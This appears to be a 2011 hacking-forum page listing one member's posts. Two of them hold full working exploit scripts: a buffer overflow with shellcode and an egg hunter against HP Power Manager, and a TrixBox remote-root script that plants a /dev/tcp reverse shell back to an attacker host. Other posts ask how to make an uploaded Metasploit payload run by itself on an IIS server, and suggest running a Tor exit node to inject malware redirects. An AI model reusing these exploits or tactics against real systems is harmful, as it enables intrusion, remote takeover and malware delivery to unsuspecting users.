Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - pl4f0rd

Pages: [1] 2
1
Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
yes, tried that, this is needed as it's the unique string for th egg hunter which has to be placed before the shellcode.  It's kind of a marker.

It's been baffling me for a few days now  :o



2
Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box

The RET address is universal

The box is exploitable

I think it's something to do with the Egg Hunter appended "n00bn00b"

Any help would be appreciated 
      •    
Code: [Select]
import sys
from socket import *
 
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
 
try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()
 
PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
 
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x38"
"\x4e\x56\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x48"
"\x49\x38\x4e\x36\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x43\x4b\x4d"
"\x46\x46\x4b\x38\x43\x54\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x46"
"\x50\x48\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x46\x4a\x36\x43\x43\x44\x33\x4a\x46\x47\x47\x43\x57"
"\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x45\x43\x35\x43\x34"
"\x43\x35\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x41"
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x56\x4a\x46\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x56\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x42"
"\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
"\x41\x30\x41\x55\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
 
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
 
evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()

3
Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video http://www.youtube.com/watch?v=XsFVz1K3sZo&feature=fvsr quality is a bit shitty but should get you started. 

4
Great  ;D


Works like a charm


Thanks

5
Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how

6
So you got any ideas on how I can get the session?

7

Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.


Any help would be greatly appreciated


Error below


Code: [Select]
   tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects


Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
                    cook=header.split(" ")
            sessionid=cook[1][10:42]
                    print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
 
# milw0rm.com [2008-07-12]


8
VB - VB.NET - C# - C++.NET / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl

9
VB - VB.NET - C# - C++.NET / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah I got a shell however it's unprivileged and running as IUSR,  I uploaded the exe and to the web server and I navigate to it and manually click on the exe which in turn loads me up a shell via the multi/handler. 


The meterpreter shell times out, cant getsystem, or sysinfo or drop into a shell.


The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.


I need an asp page that loads the exe by it's self without me clicking on it., So for example the user navigates to site and the exe is executed. 




10
General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"

11
General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.

12
VB - VB.NET - C# - C++.NET / ASP code for msfpayload
« on: July 13, 2011, 03:38:39 pm »
Ive uploaded a metasploit payload to a iis webserver in the Scripts directory currently I am executing the script directly from the browser, which in turn is causing me problems.  Any one got any ideas how I can create a dummy asp page which in turn executes my payload which will run server side

13
Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 11:02:57 am »
BackTrack 5 (Unreleased at this time) is actually built off of Ubuntu ;)

Source:
http://www.backtrack-linux.org/backtrack/backtrack-5-release-tool-suggestions/

Not sure if BT4 is built off of slax or ubuntu for sure.

Yeah very true, I was just thinking back to the time when I was a newbie I could never get to grips with  backtrack for some reason, I tried to immerse my self in it daily but it's just not built to be an everyday system, even BT R2 still doesn't feel finished if you know what I mean  :o Let's hope BT 5 is just like Ubuntu as that's a pretty easy to use and stable OS.

My main point really is it's better to immerse yourself daily in what you want to learn, with Ubtuntu you can do this, for example your network/wireless will show up automatically in BT it doesn't and could confuse the beginner.

Also, the BT forums are not very friendly if you require help.

14
Anonymity / Re: Tor project
« on: March 27, 2011, 10:28:19 am »
Very true it is slow and leaves too many logs about  I think they are currently working on the speed issue.

On the plus side though You could be an exit node for the onion network,  this way you can see all the traffic and get up to all sorts of mischief, you could modify the traffic for your own gain, MITM attacks by injecting some java script to re direct to a malicious website to install malware.

I would recommend either a highly anonymous proxy or use ssh tunnel for proxy connections

Even better nowadays is the use of cellular connections, pretty hard to track as normally each time you connect they are dynamically assigned, of course the operator could tie the ip to you.  So if you think someone is tracking your activities just reconnect.

15
Hacking and Security / Re: Hey, IM LOST
« on: March 27, 2011, 10:10:46 am »
Well Unix is pretty universal... Lol anyways it would be best to learn your way around a linux distro and the command line. Some, well most, hacking programs that you would commonly use for hacking are developed for a Linux Distribution. I would suggest checking out BackTrack. This is a Penetration testing distro and has a lot of tools to learn from.

I would suggest getting familiar with Ubuntu which is a little more user friendly than Backtrack at first.  To use some of the tools in BT you have to know your way around linux pretty well.  You can get most of the hacking tools installed on Ubuntu too.

Pages: [1] 2


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.